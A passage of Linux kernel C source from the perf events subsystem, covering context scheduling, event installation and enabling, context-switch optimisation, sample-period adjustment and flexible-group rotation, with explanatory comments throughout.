static void perf_event_sched_in(struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
struct task_struct *task)
{
cpu_ctx_sched_in(cpuctx, EVENT_PINNED, task);
if (ctx)
ctx_sched_in(ctx, cpuctx, EVENT_PINNED, task);
cpu_ctx_sched_in(cpuctx, EVENT_FLEXIBLE, task);
if (ctx)
ctx_sched_in(ctx, cpuctx, EVENT_FLEXIBLE, task);
}
/*
* We want to maintain the following priority of scheduling:
* - CPU pinned (EVENT_CPU | EVENT_PINNED)
* - task pinned (EVENT_PINNED)
* - CPU flexible (EVENT_CPU | EVENT_FLEXIBLE)
* - task flexible (EVENT_FLEXIBLE).
*
* In order to avoid unscheduling and scheduling back in everything every
* time an event is added, only do it for the groups of equal priority and
* below.
*
* This can be called after a batch operation on task events, in which case
* event_type is a bit mask of the types of events involved. For CPU events,
* event_type is only either EVENT_PINNED or EVENT_FLEXIBLE.
*/
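/*
 * For example (a hedged reading of the code below): adding a task pinned
 * event passes event_type == EVENT_PINNED, which also forces EVENT_FLEXIBLE,
 * so the task's pinned and flexible groups plus the CPU flexible groups get
 * rescheduled, while CPU pinned groups are left untouched.
 */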
static void ctx_resched(struct perf_cpu_context *cpuctx,
struct perf_event_context *task_ctx,
enum event_type_t event_type)
{
enum event_type_t ctx_event_type = event_type & EVENT_ALL;
bool cpu_event = !!(event_type & EVENT_CPU);
/*
* If pinned groups are involved, flexible groups also need to be
* scheduled out.
*/
if (event_type & EVENT_PINNED)
event_type |= EVENT_FLEXIBLE;
perf_pmu_disable(cpuctx->ctx.pmu);
if (task_ctx)
task_ctx_sched_out(cpuctx, task_ctx, event_type);
/*
* Decide which cpu ctx groups to schedule out based on the types
* of events that caused rescheduling:
* - EVENT_CPU: schedule out corresponding groups;
* - EVENT_PINNED task events: schedule out EVENT_FLEXIBLE groups;
* - otherwise, do nothing more.
*/
if (cpu_event)
cpu_ctx_sched_out(cpuctx, ctx_event_type);
else if (ctx_event_type & EVENT_PINNED)
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, task_ctx, current);
perf_pmu_enable(cpuctx->ctx.pmu);
}
/*
* Cross CPU call to install and enable a performance event
*
* Very similar to remote_function() + event_function() but cannot assume that
* things like ctx->is_active and cpuctx->task_ctx are set.
*/
static int __perf_install_in_context(void *info)
{
struct perf_event *event = info;
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = __get_cpu_context(ctx);
struct perf_event_context *task_ctx = cpuctx->task_ctx;
bool reprogram = true;
int ret = 0;
raw_spin_lock(&cpuctx->ctx.lock);
if (ctx->task) {
raw_spin_lock(&ctx->lock);
task_ctx = ctx;
reprogram = (ctx->task == current);
/*
* If the task is running, it must be running on this CPU,
* otherwise we cannot reprogram things.
*
* If it's not running, we don't care; ctx->lock will
* serialize against it becoming runnable.
*/
if (task_curr(ctx->task) && !reprogram) {
ret = -ESRCH;
goto unlock;
}
WARN_ON_ONCE(reprogram && cpuctx->task_ctx && cpuctx->task_ctx != ctx);
} else if (task_ctx) {
raw_spin_lock(&task_ctx->lock);
}
if (reprogram) {
ctx_sched_out(ctx, cpuctx, EVENT_TIME);
add_event_to_ctx(event, ctx);
ctx_resched(cpuctx, task_ctx, get_event_type(event));
} else {
add_event_to_ctx(event, ctx);
}
unlock:
perf_ctx_unlock(cpuctx, task_ctx);
return ret;
}
/*
* Attach a performance event to a context.
*
* Very similar to event_function_call, see comment there.
*/
static void
perf_install_in_context(struct perf_event_context *ctx,
struct perf_event *event,
int cpu)
{
struct task_struct *task = READ_ONCE(ctx->task);
lockdep_assert_held(&ctx->mutex);
if (event->cpu != -1)
event->cpu = cpu;
/*
* Ensures that if we can observe event->ctx, both the event and ctx
* will be 'complete'. See perf_iterate_sb_cpu().
*/
smp_store_release(&event->ctx, ctx);
if (!task) {
cpu_function_call(cpu, __perf_install_in_context, event);
return;
}
/*
* Should not happen; we validate that the ctx is still alive before calling.
*/
if (WARN_ON_ONCE(task == TASK_TOMBSTONE))
return;
/*
* Installing events is tricky because we cannot rely on ctx->is_active
* to be set in case this is the nr_events 0 -> 1 transition.
*
* Instead we use task_curr(), which tells us if the task is running.
* However, since we use task_curr() outside of rq::lock, we can race
* against the actual state. This means the result can be wrong.
*
* If we get a false positive, we retry, this is harmless.
*
* If we get a false negative, things are complicated. If we are after
* perf_event_context_sched_in() ctx::lock will serialize us, and the
* value must be correct. If we're before, it doesn't matter since
* perf_event_context_sched_in() will program the counter.
*
* However, this hinges on the remote context switch having observed
* our task->perf_event_ctxp[] store, such that it will in fact take
* ctx::lock in perf_event_context_sched_in().
*
* We do this by task_function_call(); if the IPI fails to hit the task,
* we know any future context switch of the task must see the
* perf_event_ctxp[] store.
*/
/*
* This smp_mb() orders the task->perf_event_ctxp[] store with the
* task_cpu() load, such that if the IPI then does not find the task
* running, a future context switch of that task must observe the
* store.
*/
smp_mb();
again:
if (!task_function_call(task, __perf_install_in_context, event))
return;
raw_spin_lock_irq(&ctx->lock);
task = ctx->task;
if (WARN_ON_ONCE(task == TASK_TOMBSTONE)) {
/*
* Cannot happen because we already checked above (which also
* cannot happen), and we hold ctx->mutex, which serializes us
* against perf_event_exit_task_context().
*/
raw_spin_unlock_irq(&ctx->lock);
return;
}
/*
* If the task is not running, ctx->lock will avoid it becoming so,
* thus we can safely install the event.
*/
if (task_curr(task)) {
raw_spin_unlock_irq(&ctx->lock);
goto again;
}
add_event_to_ctx(event, ctx);
raw_spin_unlock_irq(&ctx->lock);
}
/*
* Put an event into inactive state and update time fields.
* Enabling the leader of a group effectively enables all
* the group members that aren't explicitly disabled, so we
* have to update their ->tstamp_enabled also.
* Note: this works for group members as well as group leaders
* since the non-leader members' sibling_lists will be empty.
*/
static void __perf_event_mark_enabled(struct perf_event *event)
{
struct perf_event *sub;
u64 tstamp = perf_event_time(event);
event->state = PERF_EVENT_STATE_INACTIVE;
event->tstamp_enabled = tstamp - event->total_time_enabled;
list_for_each_entry(sub, &event->sibling_list, group_entry) {
if (sub->state >= PERF_EVENT_STATE_INACTIVE)
sub->tstamp_enabled = tstamp - sub->total_time_enabled;
}
}
/*
* Cross CPU call to enable a performance event
*/
static void __perf_event_enable(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
void *info)
{
struct perf_event *leader = event->group_leader;
struct perf_event_context *task_ctx;
if (event->state >= PERF_EVENT_STATE_INACTIVE ||
event->state <= PERF_EVENT_STATE_ERROR)
return;
if (ctx->is_active)
ctx_sched_out(ctx, cpuctx, EVENT_TIME);
__perf_event_mark_enabled(event);
if (!ctx->is_active)
return;
if (!event_filter_match(event)) {
if (is_cgroup_event(event))
perf_cgroup_defer_enabled(event);
ctx_sched_in(ctx, cpuctx, EVENT_TIME, current);
return;
}
/*
* If the event is in a group and isn't the group leader,
* then don't put it on unless the group is on.
*/
if (leader != event && leader->state != PERF_EVENT_STATE_ACTIVE) {
ctx_sched_in(ctx, cpuctx, EVENT_TIME, current);
return;
}
task_ctx = cpuctx->task_ctx;
if (ctx->task)
WARN_ON_ONCE(task_ctx != ctx);
ctx_resched(cpuctx, task_ctx, get_event_type(event));
}
/*
* Enable an event.
*
* If event->ctx is a cloned context, callers must make sure that
* every task struct that event->ctx->task could possibly point to
* remains valid. This condition is satisfied when called through
* perf_event_for_each_child or perf_event_for_each as described
* for perf_event_disable.
*/
static void _perf_event_enable(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
raw_spin_lock_irq(&ctx->lock);
if (event->state >= PERF_EVENT_STATE_INACTIVE ||
event->state < PERF_EVENT_STATE_ERROR) {
raw_spin_unlock_irq(&ctx->lock);
return;
}
/*
* If the event is in error state, clear that first.
*
* That way, if we see the event in error state below, we know that it
* has gone back into error state, as distinct from the task having
* been scheduled away before the cross-call arrived.
*/
if (event->state == PERF_EVENT_STATE_ERROR)
event->state = PERF_EVENT_STATE_OFF;
raw_spin_unlock_irq(&ctx->lock);
event_function_call(event, __perf_event_enable, NULL);
}
/*
* See perf_event_disable();
*/
void perf_event_enable(struct perf_event *event)
{
struct perf_event_context *ctx;
ctx = perf_event_ctx_lock(event);
_perf_event_enable(event);
perf_event_ctx_unlock(event, ctx);
}
EXPORT_SYMBOL_GPL(perf_event_enable);
struct stop_event_data {
struct perf_event *event;
unsigned int restart;
};
static int __perf_event_stop(void *info)
{
struct stop_event_data *sd = info;
struct perf_event *event = sd->event;
/* if it's already INACTIVE, do nothing */
if (READ_ONCE(event->state) != PERF_EVENT_STATE_ACTIVE)
return 0;
/* matches smp_wmb() in event_sched_in() */
smp_rmb();
/*
* There is a window with interrupts enabled before we get here,
* so we need to check again lest we try to stop another CPU's event.
*/
if (READ_ONCE(event->oncpu) != smp_processor_id())
return -EAGAIN;
event->pmu->stop(event, PERF_EF_UPDATE);
/*
* May race with the actual stop (through perf_pmu_output_stop()),
* but it is only used for events with AUX ring buffer, and such
* events will refuse to restart because of rb::aux_mmap_count==0,
* see comments in perf_aux_output_begin().
*
* Since this is happening on an event-local CPU, no trace is lost
* while restarting.
*/
if (sd->restart)
event->pmu->start(event, 0);
return 0;
}
static int perf_event_stop(struct perf_event *event, int restart)
{
struct stop_event_data sd = {
.event = event,
.restart = restart,
};
int ret = 0;
do {
if (READ_ONCE(event->state) != PERF_EVENT_STATE_ACTIVE)
return 0;
/* matches smp_wmb() in event_sched_in() */
smp_rmb();
/*
* We only want to restart ACTIVE events, so if the event goes
* inactive here (event->oncpu==-1), there's nothing more to do;
* fall through with ret==-ENXIO.
*/
ret = cpu_function_call(READ_ONCE(event->oncpu),
__perf_event_stop, &sd);
} while (ret == -EAGAIN);
return ret;
}
/*
* In order to contain the amount of racy and tricky code in the address filter
* configuration management, it is a two part process:
*
* (p1) when userspace mappings change as a result of (1) or (2) or (3) below,
* we update the addresses of corresponding vmas in
* event::addr_filters_offs array and bump the event::addr_filters_gen;
* (p2) when an event is scheduled in (pmu::add), it calls
* perf_event_addr_filters_sync() which calls pmu::addr_filters_sync()
* if the generation has changed since the previous call.
*
* If (p1) happens while the event is active, we restart it to force (p2).
*
* (1) perf_addr_filters_apply(): adjusting filters' offsets based on
* pre-existing mappings, called once when new filters arrive via SET_FILTER
* ioctl;
* (2) perf_addr_filters_adjust(): adjusting filters' offsets based on newly
* registered mapping, called for every new mmap(), with mm::mmap_sem down
* for reading;
* (3) perf_event_addr_filters_exec(): clearing filters' offsets in the process
* of exec.
*/
void perf_event_addr_filters_sync(struct perf_event *event)
{
struct perf_addr_filters_head *ifh = perf_event_addr_filters(event);
if (!has_addr_filter(event))
return;
raw_spin_lock(&ifh->lock);
if (event->addr_filters_gen != event->hw.addr_filters_gen) {
event->pmu->addr_filters_sync(event);
event->hw.addr_filters_gen = event->addr_filters_gen;
}
raw_spin_unlock(&ifh->lock);
}
EXPORT_SYMBOL_GPL(perf_event_addr_filters_sync);
static int _perf_event_refresh(struct perf_event *event, int refresh)
{
/*
* not supported on inherited events
*/
if (event->attr.inherit || !is_sampling_event(event))
return -EINVAL;
atomic_add(refresh, &event->event_limit);
_perf_event_enable(event);
return 0;
}
/*
* See perf_event_disable()
*/
int perf_event_refresh(struct perf_event *event, int refresh)
{
struct perf_event_context *ctx;
int ret;
ctx = perf_event_ctx_lock(event);
ret = _perf_event_refresh(event, refresh);
perf_event_ctx_unlock(event, ctx);
return ret;
}
EXPORT_SYMBOL_GPL(perf_event_refresh);
static void ctx_sched_out(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx,
enum event_type_t event_type)
{
int is_active = ctx->is_active;
struct perf_event *event;
lockdep_assert_held(&ctx->lock);
if (likely(!ctx->nr_events)) {
/*
* See __perf_remove_from_context().
*/
WARN_ON_ONCE(ctx->is_active);
if (ctx->task)
WARN_ON_ONCE(cpuctx->task_ctx);
return;
}
ctx->is_active &= ~event_type;
if (!(ctx->is_active & EVENT_ALL))
ctx->is_active = 0;
if (ctx->task) {
WARN_ON_ONCE(cpuctx->task_ctx != ctx);
if (!ctx->is_active)
cpuctx->task_ctx = NULL;
}
/*
* Always update time if it was set; not only when it changes.
* Otherwise we can 'forget' to update time for any but the last
* context we sched out. For example:
*
* ctx_sched_out(.event_type = EVENT_FLEXIBLE)
* ctx_sched_out(.event_type = EVENT_PINNED)
*
* would only update time for the pinned events.
*/
if (is_active & EVENT_TIME) {
/* update (and stop) ctx time */
update_context_time(ctx);
update_cgrp_time_from_cpuctx(cpuctx);
}
is_active ^= ctx->is_active; /* changed bits */
if (!ctx->nr_active || !(is_active & EVENT_ALL))
return;
perf_pmu_disable(ctx->pmu);
if (is_active & EVENT_PINNED) {
list_for_each_entry(event, &ctx->pinned_groups, group_entry)
group_sched_out(event, cpuctx, ctx);
}
if (is_active & EVENT_FLEXIBLE) {
list_for_each_entry(event, &ctx->flexible_groups, group_entry)
group_sched_out(event, cpuctx, ctx);
}
perf_pmu_enable(ctx->pmu);
}
/*
* Test whether two contexts are equivalent, i.e. whether they have both been
* cloned from the same version of the same context.
*
* Equivalence is measured using a generation number in the context that is
* incremented on each modification to it; see unclone_ctx(), list_add_event()
* and list_del_event().
*/
static int context_equiv(struct perf_event_context *ctx1,
struct perf_event_context *ctx2)
{
lockdep_assert_held(&ctx1->lock);
lockdep_assert_held(&ctx2->lock);
/* Pinning disables the swap optimization */
if (ctx1->pin_count || ctx2->pin_count)
return 0;
/* If ctx1 is the parent of ctx2 */
if (ctx1 == ctx2->parent_ctx && ctx1->generation == ctx2->parent_gen)
return 1;
/* If ctx2 is the parent of ctx1 */
if (ctx1->parent_ctx == ctx2 && ctx1->parent_gen == ctx2->generation)
return 1;
/*
* If ctx1 and ctx2 have the same parent; we flatten the parent
* hierarchy, see perf_event_init_context().
*/
if (ctx1->parent_ctx && ctx1->parent_ctx == ctx2->parent_ctx &&
ctx1->parent_gen == ctx2->parent_gen)
return 1;
/* Unmatched */
return 0;
}
static void __perf_event_sync_stat(struct perf_event *event,
struct perf_event *next_event)
{
u64 value;
if (!event->attr.inherit_stat)
return;
/*
* Update the event value, we cannot use perf_event_read()
* because we're in the middle of a context switch and have IRQs
* disabled, which upsets smp_call_function_single(), however
* we know the event must be on the current CPU, therefore we
* don't need to use it.
*/
switch (event->state) {
case PERF_EVENT_STATE_ACTIVE:
event->pmu->read(event);
/* fall-through */
case PERF_EVENT_STATE_INACTIVE:
update_event_times(event);
break;
default:
break;
}
/*
* In order to keep per-task stats reliable we need to flip the event
* values when we flip the contexts.
*/
value = local64_read(&next_event->count);
value = local64_xchg(&event->count, value);
local64_set(&next_event->count, value);
swap(event->total_time_enabled, next_event->total_time_enabled);
swap(event->total_time_running, next_event->total_time_running);
/*
* Since we swizzled the values, update the user visible data too.
*/
perf_event_update_userpage(event);
perf_event_update_userpage(next_event);
}
static void perf_event_sync_stat(struct perf_event_context *ctx,
struct perf_event_context *next_ctx)
{
struct perf_event *event, *next_event;
if (!ctx->nr_stat)
return;
update_context_time(ctx);
event = list_first_entry(&ctx->event_list,
struct perf_event, event_entry);
next_event = list_first_entry(&next_ctx->event_list,
struct perf_event, event_entry);
while (&event->event_entry != &ctx->event_list &&
&next_event->event_entry != &next_ctx->event_list) {
__perf_event_sync_stat(event, next_event);
event = list_next_entry(event, event_entry);
next_event = list_next_entry(next_event, event_entry);
}
}
static void perf_event_context_sched_out(struct task_struct *task, int ctxn,
struct task_struct *next)
{
struct perf_event_context *ctx = task->perf_event_ctxp[ctxn];
struct perf_event_context *next_ctx;
struct perf_event_context *parent, *next_parent;
struct perf_cpu_context *cpuctx;
int do_switch = 1;
if (likely(!ctx))
return;
cpuctx = __get_cpu_context(ctx);
if (!cpuctx->task_ctx)
return;
rcu_read_lock();
next_ctx = next->perf_event_ctxp[ctxn];
if (!next_ctx)
goto unlock;
parent = rcu_dereference(ctx->parent_ctx);
next_parent = rcu_dereference(next_ctx->parent_ctx);
/* If neither context has a parent context, they cannot be clones. */
if (!parent && !next_parent)
goto unlock;
if (next_parent == ctx || next_ctx == parent || next_parent == parent) {
/*
* Looks like the two contexts are clones, so we might be
* able to optimize the context switch. We lock both
* contexts and check that they are clones under the
* lock (including re-checking that neither has been
* uncloned in the meantime). It doesn't matter which
* order we take the locks because no other cpu could
* be trying to lock both of these tasks.
*/
raw_spin_lock(&ctx->lock);
raw_spin_lock_nested(&next_ctx->lock, SINGLE_DEPTH_NESTING);
if (context_equiv(ctx, next_ctx)) {
WRITE_ONCE(ctx->task, next);
WRITE_ONCE(next_ctx->task, task);
swap(ctx->task_ctx_data, next_ctx->task_ctx_data);
/*
* RCU_INIT_POINTER here is safe because we've not
* modified the ctx and the above modification of
* ctx->task and ctx->task_ctx_data are immaterial
* since those values are always verified under
* ctx->lock which we're now holding.
*/
RCU_INIT_POINTER(task->perf_event_ctxp[ctxn], next_ctx);
RCU_INIT_POINTER(next->perf_event_ctxp[ctxn], ctx);
do_switch = 0;
perf_event_sync_stat(ctx, next_ctx);
}
raw_spin_unlock(&next_ctx->lock);
raw_spin_unlock(&ctx->lock);
}
unlock:
rcu_read_unlock();
if (do_switch) {
raw_spin_lock(&ctx->lock);
task_ctx_sched_out(cpuctx, ctx, EVENT_ALL);
raw_spin_unlock(&ctx->lock);
}
}
static DEFINE_PER_CPU(struct list_head, sched_cb_list);
void perf_sched_cb_dec(struct pmu *pmu)
{
struct perf_cpu_context *cpuctx = this_cpu_ptr(pmu->pmu_cpu_context);
this_cpu_dec(perf_sched_cb_usages);
if (!--cpuctx->sched_cb_usage)
list_del(&cpuctx->sched_cb_entry);
}
void perf_sched_cb_inc(struct pmu *pmu)
{
struct perf_cpu_context *cpuctx = this_cpu_ptr(pmu->pmu_cpu_context);
if (!cpuctx->sched_cb_usage++)
list_add(&cpuctx->sched_cb_entry, this_cpu_ptr(&sched_cb_list));
this_cpu_inc(perf_sched_cb_usages);
}
/*
* This function provides the context switch callback to the lower code
* layer. It is invoked ONLY when the context switch callback is enabled.
*
* This callback is relevant even to per-cpu events; for example multi event
* PEBS requires this to provide PID/TID information. This requires we flush
* all queued PEBS records before we context switch to a new task.
*/
static void perf_pmu_sched_task(struct task_struct *prev,
struct task_struct *next,
bool sched_in)
{
struct perf_cpu_context *cpuctx;
struct pmu *pmu;
if (prev == next)
return;
list_for_each_entry(cpuctx, this_cpu_ptr(&sched_cb_list), sched_cb_entry) {
pmu = cpuctx->ctx.pmu; /* software PMUs will not have sched_task */
if (WARN_ON_ONCE(!pmu->sched_task))
continue;
perf_ctx_lock(cpuctx, cpuctx->task_ctx);
perf_pmu_disable(pmu);
pmu->sched_task(cpuctx->task_ctx, sched_in);
perf_pmu_enable(pmu);
perf_ctx_unlock(cpuctx, cpuctx->task_ctx);
}
}
static void perf_event_switch(struct task_struct *task,
struct task_struct *next_prev, bool sched_in);
#define for_each_task_context_nr(ctxn) \
for ((ctxn) = 0; (ctxn) < perf_nr_task_contexts; (ctxn)++)
/*
* Called from scheduler to remove the events of the current task,
* with interrupts disabled.
*
* We stop each event and update the event value in event->count.
*
* This does not protect us against NMI, but disable()
* sets the disabled bit in the control field of event _before_
* accessing the event control register. If a NMI hits, then it will
* not restart the event.
*/
void __perf_event_task_sched_out(struct task_struct *task,
struct task_struct *next)
{
int ctxn;
if (__this_cpu_read(perf_sched_cb_usages))
perf_pmu_sched_task(task, next, false);
if (atomic_read(&nr_switch_events))
perf_event_switch(task, next, false);
for_each_task_context_nr(ctxn)
perf_event_context_sched_out(task, ctxn, next);
/*
* If cgroup events exist on this CPU, then we need
* to check if we have to switch out PMU state.
* Cgroup events are system-wide mode only.
*/
if (atomic_read(this_cpu_ptr(&perf_cgroup_events)))
perf_cgroup_sched_out(task, next);
}
/*
* Called with IRQs disabled
*/
static void cpu_ctx_sched_out(struct perf_cpu_context *cpuctx,
enum event_type_t event_type)
{
ctx_sched_out(&cpuctx->ctx, cpuctx, event_type);
}
static void
ctx_pinned_sched_in(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx)
{
struct perf_event *event;
list_for_each_entry(event, &ctx->pinned_groups, group_entry) {
if (event->state <= PERF_EVENT_STATE_OFF)
continue;
if (!event_filter_match(event))
continue;
/* may need to reset tstamp_enabled */
if (is_cgroup_event(event))
perf_cgroup_mark_enabled(event, ctx);
if (group_can_go_on(event, cpuctx, 1))
group_sched_in(event, cpuctx, ctx);
/*
* If this pinned group hasn't been scheduled,
* put it in error state.
*/
if (event->state == PERF_EVENT_STATE_INACTIVE) {
update_group_times(event);
event->state = PERF_EVENT_STATE_ERROR;
}
}
}
static void
ctx_flexible_sched_in(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx)
{
struct perf_event *event;
int can_add_hw = 1;
list_for_each_entry(event, &ctx->flexible_groups, group_entry) {
/* Ignore events in OFF or ERROR state */
if (event->state <= PERF_EVENT_STATE_OFF)
continue;
/*
* Listen to the 'cpu' scheduling filter constraint
* of events:
*/
if (!event_filter_match(event))
continue;
/* may need to reset tstamp_enabled */
if (is_cgroup_event(event))
perf_cgroup_mark_enabled(event, ctx);
if (group_can_go_on(event, cpuctx, can_add_hw)) {
if (group_sched_in(event, cpuctx, ctx))
can_add_hw = 0;
}
}
}
static void
ctx_sched_in(struct perf_event_context *ctx,
struct perf_cpu_context *cpuctx,
enum event_type_t event_type,
struct task_struct *task)
{
int is_active = ctx->is_active;
u64 now;
lockdep_assert_held(&ctx->lock);
if (likely(!ctx->nr_events))
return;
ctx->is_active |= (event_type | EVENT_TIME);
if (ctx->task) {
if (!is_active)
cpuctx->task_ctx = ctx;
else
WARN_ON_ONCE(cpuctx->task_ctx != ctx);
}
is_active ^= ctx->is_active; /* changed bits */
if (is_active & EVENT_TIME) {
/* start ctx time */
now = perf_clock();
ctx->timestamp = now;
perf_cgroup_set_timestamp(task, ctx);
}
/*
* First go through the list and put on any pinned groups
* in order to give them the best chance of going on.
*/
if (is_active & EVENT_PINNED)
ctx_pinned_sched_in(ctx, cpuctx);
/* Then walk through the lower prio flexible groups */
if (is_active & EVENT_FLEXIBLE)
ctx_flexible_sched_in(ctx, cpuctx);
}
static void cpu_ctx_sched_in(struct perf_cpu_context *cpuctx,
enum event_type_t event_type,
struct task_struct *task)
{
struct perf_event_context *ctx = &cpuctx->ctx;
ctx_sched_in(ctx, cpuctx, event_type, task);
}
static void perf_event_context_sched_in(struct perf_event_context *ctx,
struct task_struct *task)
{
struct perf_cpu_context *cpuctx;
cpuctx = __get_cpu_context(ctx);
if (cpuctx->task_ctx == ctx)
return;
perf_ctx_lock(cpuctx, ctx);
perf_pmu_disable(ctx->pmu);
/*
* We want to keep the following priority order:
* cpu pinned (that don't need to move), task pinned,
* cpu flexible, task flexible.
*
* However, if the task's ctx is not carrying any pinned
* events, there is no need to flip the cpuctx's events around.
*/
if (!list_empty(&ctx->pinned_groups))
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, ctx, task);
perf_pmu_enable(ctx->pmu);
perf_ctx_unlock(cpuctx, ctx);
}
/*
* Called from scheduler to add the events of the current task
* with interrupts disabled.
*
* We restore the event value and then enable it.
*
* This does not protect us against NMI, but enable()
* sets the enabled bit in the control field of event _before_
* accessing the event control register. If a NMI hits, then it will
* keep the event running.
*/
void __perf_event_task_sched_in(struct task_struct *prev,
struct task_struct *task)
{
struct perf_event_context *ctx;
int ctxn;
/*
* If cgroup events exist on this CPU, then we need to check if we have
* to switch in PMU state; cgroup event are system-wide mode only.
*
* Since cgroup events are CPU events, we must schedule these in before
* we schedule in the task events.
*/
if (atomic_read(this_cpu_ptr(&perf_cgroup_events)))
perf_cgroup_sched_in(prev, task);
for_each_task_context_nr(ctxn) {
ctx = task->perf_event_ctxp[ctxn];
if (likely(!ctx))
continue;
perf_event_context_sched_in(ctx, task);
}
if (atomic_read(&nr_switch_events))
perf_event_switch(task, prev, true);
if (__this_cpu_read(perf_sched_cb_usages))
perf_pmu_sched_task(prev, task, true);
}
static u64 perf_calculate_period(struct perf_event *event, u64 nsec, u64 count)
{
u64 frequency = event->attr.sample_freq;
u64 sec = NSEC_PER_SEC;
u64 divisor, dividend;
int count_fls, nsec_fls, frequency_fls, sec_fls;
count_fls = fls64(count);
nsec_fls = fls64(nsec);
frequency_fls = fls64(frequency);
sec_fls = 30;
/*
* We got @count in @nsec; with a target of sample_freq HZ,
* the target period becomes:
*
* @count * 10^9
* period = -------------------
* @nsec * sample_freq
*
*/
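/*
 * A hypothetical worked example: 2,000,000 counts observed over 10ms
 * (10^7 ns) with sample_freq = 1000 gives
 * period = (2e6 * 1e9) / (1e7 * 1000) = 200,000 counts per sample.
 */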
/*
* Reduce accuracy by one bit such that @a and @b converge
* to a similar magnitude.
*/
#define REDUCE_FLS(a, b) \
do { \
if (a##_fls > b##_fls) { \
a >>= 1; \
a##_fls--; \
} else { \
b >>= 1; \
b##_fls--; \
} \
} while (0)
/*
* Reduce accuracy until either term fits in a u64, then proceed with
* the other, so that finally we can do a u64/u64 division.
*/
while (count_fls + sec_fls > 64 && nsec_fls + frequency_fls > 64) {
REDUCE_FLS(nsec, frequency);
REDUCE_FLS(sec, count);
}
if (count_fls + sec_fls > 64) {
divisor = nsec * frequency;
while (count_fls + sec_fls > 64) {
REDUCE_FLS(count, sec);
divisor >>= 1;
}
dividend = count * sec;
} else {
dividend = count * sec;
while (nsec_fls + frequency_fls > 64) {
REDUCE_FLS(nsec, frequency);
dividend >>= 1;
}
divisor = nsec * frequency;
}
if (!divisor)
return dividend;
return div64_u64(dividend, divisor);
}
static DEFINE_PER_CPU(int, perf_throttled_count);
static DEFINE_PER_CPU(u64, perf_throttled_seq);
static void perf_adjust_period(struct perf_event *event, u64 nsec, u64 count, bool disable)
{
struct hw_perf_event *hwc = &event->hw;
s64 period, sample_period;
s64 delta;
period = perf_calculate_period(event, nsec, count);
delta = (s64)(period - hwc->sample_period);
delta = (delta + 7) / 8; /* low pass filter */
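/*
 * The divide-by-8 acts as a simple low-pass filter: only ~1/8th of the
 * computed adjustment is applied per tick. E.g. (hypothetical numbers) a
 * suggested change of +800 moves sample_period by only +100 this round.
 */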
sample_period = hwc->sample_period + delta;
if (!sample_period)
sample_period = 1;
hwc->sample_period = sample_period;
if (local64_read(&hwc->period_left) > 8*sample_period) {
if (disable)
event->pmu->stop(event, PERF_EF_UPDATE);
local64_set(&hwc->period_left, 0);
if (disable)
event->pmu->start(event, PERF_EF_RELOAD);
}
}
/*
* Combine freq adjustment with unthrottling to avoid two passes over the
* events. At the same time, make sure that having freq events does not change
* the rate of unthrottling, as that would introduce bias.
*/
static void perf_adjust_freq_unthr_context(struct perf_event_context *ctx,
int needs_unthr)
{
struct perf_event *event;
struct hw_perf_event *hwc;
u64 now, period = TICK_NSEC;
s64 delta;
/*
* only need to iterate over all events if:
* - the context has events in frequency mode (needs freq adjust)
* - there are events to unthrottle on this cpu
*/
if (!(ctx->nr_freq || needs_unthr))
return;
raw_spin_lock(&ctx->lock);
perf_pmu_disable(ctx->pmu);
list_for_each_entry_rcu(event, &ctx->event_list, event_entry) {
if (event->state != PERF_EVENT_STATE_ACTIVE)
continue;
if (!event_filter_match(event))
continue;
perf_pmu_disable(event->pmu);
hwc = &event->hw;
if (hwc->interrupts == MAX_INTERRUPTS) {
hwc->interrupts = 0;
perf_log_throttle(event, 1);
event->pmu->start(event, 0);
}
if (!event->attr.freq || !event->attr.sample_freq)
goto next;
/*
* stop the event and update event->count
*/
event->pmu->stop(event, PERF_EF_UPDATE);
now = local64_read(&event->count);
delta = now - hwc->freq_count_stamp;
hwc->freq_count_stamp = now;
/*
* Restart the event; reload only if the value has changed.
* We have already stopped the event, so tell
* perf_adjust_period() to avoid stopping it twice.
*/
if (delta > 0)
perf_adjust_period(event, period, delta, false);
event->pmu->start(event, delta > 0 ? PERF_EF_RELOAD : 0);
next:
perf_pmu_enable(event->pmu);
}
perf_pmu_enable(ctx->pmu);
raw_spin_unlock(&ctx->lock);
}
/*
* Round-robin a context's events:
*/
static void rotate_ctx(struct perf_event_context *ctx)
{
/*
* Rotate the first entry last of non-pinned groups. Rotation might be
* disabled by the inheritance code.
*/
if (!ctx->rotate_disable)
list_rotate_left(&ctx->flexible_groups);
}
static int perf_rotate_context(struct perf_cpu_context *cpuctx)
{
struct perf_event_context *ctx = NULL;
int rotate = 0;
if (cpuctx->ctx.nr_events) {
if (cpuctx->ctx.nr_events != cpuctx->ctx.nr_active)
rotate = 1;
}
ctx = cpuctx->task_ctx;
if (ctx && ctx->nr_events) {
if (ctx->nr_events != ctx->nr_active)
rotate = 1;
}
if (!rotate)
goto done;
perf_ctx_lock(cpuctx, cpuctx->task_ctx);
perf_pmu_disable(cpuctx->ctx.pmu);
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
if (ctx)
ctx_sched_out(ctx, cpuctx, EVENT_FLEXIBLE);
rotate_ctx(&cpuctx->ctx);
if (ctx)
rotate_ctx(ctx);
perf_event_sched_in(cpuctx, ctx, current);
perf_pmu_enable(cpuctx->ctx.pmu);
perf_ctx_unlock(cpuctx, cpuctx->task_ctx);
done:
return rotate;
}
void perf_event_task_tick(void)
{
struct list_head *head = this_cpu_ptr(&active_ctx_list);
struct perf_event_context *ctx, *tmp;
int throttled;
WARN_ON(!irqs_disabled());
__this_cpu_inc(perf_throttled_seq);
throttled = __this_cpu_xchg(perf_throttled_count, 0);
tick_dep_clear_cpu(smp_processor_id(), TICK_DEP_BIT_PERF_EVENTS);
list_for_each_entry_safe(ctx, tmp, head, active_ctx_list)
perf_adjust_freq_unthr_context(ctx, throttled);
}
static int event_enable_on_exec(struct perf_event *event,
struct perf_event_context *ctx)
{
if (!event->attr.enable_on_exec)
return 0;
event->attr.enable_on_exec = 0;
if (event->state >= PERF_EVENT_STATE_INACTIVE)
return 0;
